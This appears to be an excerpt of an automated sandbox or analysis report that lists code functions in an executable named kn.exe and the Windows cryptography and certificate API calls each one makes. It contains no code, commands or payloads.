Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEBDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,25_2_00007FF67DEBDEB0
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE8DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,25_2_00007FF67DE8DEA4
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF35FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,25_2_00007FF67DF35FF0
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEFDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,25_2_00007FF67DEFDE70
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEC1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEC1E2C
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE65DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,25_2_00007FF67DE65DF7
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE41DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,25_2_00007FF67DE41DE8
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE65DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,25_2_00007FF67DE65DA1
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE8DD80 CertFindExtension,CryptDecodeObject,25_2_00007FF67DE8DD80
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEE5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,25_2_00007FF67DEE5D80
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE91D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE91D70
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE89D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE89D6C
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEB3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,25_2_00007FF67DEB3D60
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF07D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,25_2_00007FF67DF07D3C
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF0BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,25_2_00007FF67DF0BD3C
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF35D74 CryptDecodeObjectEx,strcmp,strcmp,25_2_00007FF67DF35D74
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE660DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,25_2_00007FF67DE660DA
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,25_2_00007FF67DEA4070
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,25_2_00007FF67DEFE044
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,25_2_00007FF67DF35E3C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE65FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,25_2_00007FF67DE65FE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,25_2_00007FF67DED5FA8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,25_2_00007FF67DED9F90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,25_2_00007FF67DE6FF64
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,25_2_00007FF67DEA5F54
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35F20 CryptDecodeObjectEx,25_2_00007FF67DF35F20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,25_2_00007FF67DF0BB50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE93B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,25_2_00007FF67DE93B14
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,25_2_00007FF67DEC9AF8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35B90 CryptDecodeObjectEx,memmove,25_2_00007FF67DF35B90
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,25_2_00007FF67DEFFA84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED7A70
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,25_2_00007FF67DEE9A58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEEBA50 CryptSignCertificate,SetLastError,25_2_00007FF67DEEBA50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED1A44
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE63A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE63A40
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35C54 CryptDecodeObjectEx,CryptDecodeObjectEx,25_2_00007FF67DF35C54
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,25_2_00007FF67DEBB9CC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,25_2_00007FF67DE5F9B8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE67988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,25_2_00007FF67DE67988
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,25_2_00007FF67DEB597C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,25_2_00007FF67DEF9970
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB950 I_CryptGetLruEntryData,#357,25_2_00007FF67DEBB950
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8F944 CryptDecodeObject,GetLastError,#357,25_2_00007FF67DE8F944
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFFD2C CryptDecryptMessage,GetLastError,#357,25_2_00007FF67DEFFD2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEEDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,25_2_00007FF67DEEDD1C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF2B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,25_2_00007FF67DF2B980
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,25_2_00007FF67DEC5CE8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,25_2_00007FF67DEC1C84
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE83C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DE83C60
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,25_2_00007FF67DF0BA14
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE71C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,25_2_00007FF67DE71C50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE8FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE8FC34
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,25_2_00007FF67DE6FC20
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DED3BEB
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE59BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,25_2_00007FF67DE59BC8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF35AA8 CryptDecodeObjectEx,25_2_00007FF67DF35AA8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,25_2_00007FF67DEDBBC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE35BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DE35BA4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,25_2_00007FF67DEFFB94
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,25_2_00007FF67DE5BB80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF07B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,25_2_00007FF67DF07B60
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,25_2_00007FF67DEDFB50
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF05B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,25_2_00007FF67DF05B44
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE9BB38
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED36E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,25_2_00007FF67DEBF6D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE876B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DE876B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEED6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,25_2_00007FF67DEED6A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF9688 CryptFindOIDInfo,#357,#360,#360,#360,25_2_00007FF67DEF9688
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,25_2_00007FF67DEA366C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,25_2_00007FF67DEBB664
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE45664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,25_2_00007FF67DE45664
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,25_2_00007FF67DE5D660
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,25_2_00007FF67DED3654
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF650 CryptHashCertificate2,SetLastError,25_2_00007FF67DEFF650
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,25_2_00007FF67DECF644
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5F630 CryptAcquireContextW,GetLastError,#357,SetLastError,25_2_00007FF67DE5F630
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,25_2_00007FF67DEB95FC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE955F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,25_2_00007FF67DE955F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE5D5C2
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,25_2_00007FF67DF098B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED3590
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF570 CryptHashCertificate,SetLastError,25_2_00007FF67DEFF570
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,25_2_00007FF67DE9B55C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE53918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE53918
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,25_2_00007FF67DED391C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,25_2_00007FF67DEFF918
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE438FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,25_2_00007FF67DE438FC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF09580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,25_2_00007FF67DF09580
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,25_2_00007FF67DEA18DC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB8D0 I_CryptGetLruEntryData,#357,25_2_00007FF67DEBB8D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,25_2_00007FF67DEA9878
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE67884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,25_2_00007FF67DE67884
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED3860
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,25_2_00007FF67DEBD850
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,25_2_00007FF67DEC184C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,25_2_00007FF67DEBB808
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,25_2_00007FF67DE6F810
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,25_2_00007FF67DEFF7FC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,25_2_00007FF67DEE97E4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE717D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,25_2_00007FF67DE717D4
